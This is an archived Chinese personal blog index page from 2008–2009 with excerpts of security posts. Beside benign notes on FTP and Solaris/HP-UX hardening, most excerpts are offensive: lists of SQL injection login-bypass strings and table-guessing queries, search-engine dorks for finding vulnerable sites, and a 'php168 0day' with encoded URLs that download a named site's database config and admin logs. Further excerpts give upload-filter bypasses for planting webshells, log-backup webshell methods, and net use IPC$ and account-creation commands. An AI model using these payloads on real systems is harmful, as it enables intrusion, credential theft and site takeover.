Pentuc
百度空间 | 百度首页 
 
文章列表
 
昆明.一二一大街
2009-04-15 18:33

阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
or
2008-12-10 14:42
') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
主动FTP vs. 被动FTP 权威解释
2008-12-01 10:58
主动FTP vs. 被动FTP 权威解释

主动FTP与被动FTP-权威解释

目录

  • 开场白
  • 基础
  • 主动FTP
  • 主动FTP的例子
  • 被动FTP
  • 被动FTP的例子
  • 总结
  • 参考资料
  • 附录 1: 配置常见FTP服务器


开场白

处理防火墙和其他网络连接问题时最常见的一个难题是主
阅读全文>>
类别:默认分类 | 评论(0) | 浏览()
 
test
2008-11-20 15:40

经典的用户名密码
’or’=’or’
’or’1’=’1

网上好多这样的文章我的只不过是来个小总结,恩其实光是总结还不够,因为我写的还不是很全面。
其实搜索这些漏洞我们必须要先连接关于搜索引擎的一些语法下面给大家介绍一下

inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用.
intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题,URL等的文字).
site: 可以限制你搜索范围的域名.
filetype: 搜

阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
HP-UNIX  加固
2008-11-17 13:56

一、 基本系统管理

  1、常用命令

  1. # ioscan -fn

  列出各I/O卡及设备的所有相关信息:如逻辑单元号,硬件地址及设备文件名等。

  2. # ps -ef

  列出正在运行的所有进程的各种信息:如进程号及进程名等。

  3. # netstat -rn

  列出网卡状态及路由信息等。

  4. # lanscan

  列出网卡状态及网络配置信息。

  5. # bdf

  列出已加载的逻辑卷及其大小信息。

  6. # mount

  列出已加载的逻辑卷及其加

阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
Solaris 服务重启与关闭
2008-11-17 13:55

1.Disabled Volume Management
# cd /etc/rc2.d
# mv S92volmgt s92volmgt
After this configuration, CD-ROMs will not be automatically mounted. To manually mount a CD-ROM use:
# mount -F hsfs -o ro /dev/dsk/c0t6d0s0 /mnt
2.Disabled Dtlogin
Dtlogin is disabled if the server is not intended to run the Common Desktop Environment (CDE) or GUIs.
# cd /etc/rc2.d
# mv S99dtlogin s99dtlogin
3.Disabled Printing
# /usr/lib/lpshut
# cd /etc/rc2.d

阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
Solaris系统安全加固列表
2008-11-17 13:51
一、安全理念
1、安全的隐患更多来自于企业内部
2、对于管理员的要求:不要信任任何人
3、分层保护策略:假设某些安全保护层完全失效
4、服务最小化
5、为最坏的情况做打算

二、物理安全
1、记录进出机房的人员名单,考虑安装摄像机
2、审查PROM是否被更换,可以通过记录hostid进行比较
3、每个系统的OpenBoot口令应该不一样,口令方案不可预测
4、系统安装完毕移除CD-ROM
5、将版本介质放入不在本场地的介质储藏室中

三、账号与口令策略
阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
php168 0day
2008-11-03 14:57

首先说明下是这个洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!
这个洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,一下是利用方法。

下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2d

阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
SQL注入经典经典方法和语句
2008-10-19 12:15

1.判断有无注入点


' ; and 1=1 and 1=2



2.猜表一般的表的名称无非是admin adminuser user pass password 等..


and 0<>(select count(*) from *)


and 0<>(select count(*) from admin) ---判断是否存在admin这张表



3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个


and 0<(select count(*) from admin)


and 1<(select count(*) from admin)



4.猜解字段名称 在

阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
LOG备份与备份差异的对比
2008-10-19 12:14
当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法.
但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题,我在这里做个总结,也
好让我们对不能闭合的方法有一个全面的了解.
1.先介绍下LOG备份,这个相信大家都很熟悉了,我还是习惯在IE里直接提交,返回正常的页面就说这一步的操作就成功了,如果没有返回正常的页面
阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
Network Administration with FreeBSD 7
2008-10-18 18:46

重新投入FreeBSD 和 Linux的怀抱.刚在CU上看到这本书.也不知道写的怎样.先下下来看看.

类别:Freebsd | 评论(0) | 浏览()
 
上传漏洞利用方法
2008-10-14 15:48
1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell。

2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。

3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。

4.gif 文件头欺骗,gif89a文件头检测是指程序为了他人将asp等文件后缀改为gif后上传,读取gif文件头,检测是否有gif87a或gif89a标记,是就允许上传,不是就说明不是gif文件。 而欺骗刚好是利用检测这两个标记,只要在木马代码前加gif87a就能骗过去。
类别:安全 | 评论(0) | 浏览()
 
PHP注入技术
2008-10-11 20:32

or ‘1=1

‘/*

‘%23

‘ and password=’mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char(97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 (ord函数很好用

阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
黑客基础之DOS 攻击
2008-10-11 19:57

黑客基础之DOS 攻击

net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /a

阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
测试MS Windows 2003 Token Kidnapping Local Exploit PoC 成功
2008-10-10 16:48
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) 
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows 
services accounts can impersonate.  Other process (not service
阅读全文>>
类别:安全 | 评论(0) | 浏览()
 
     
 
 
个人档案
 
pentuc

上次登录:
9月 5日
加为好友
 
   
 
文章分类
 
默认分类(2)
 
安全(12)
 
Freebsd(1)
 
     
 
最新评论
 
文章评论|照片评论
建设路
 
金马
 
建设路
 
建设路
 
建设路
 
更多评论>>
     
 
好友最新文章
 
     
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu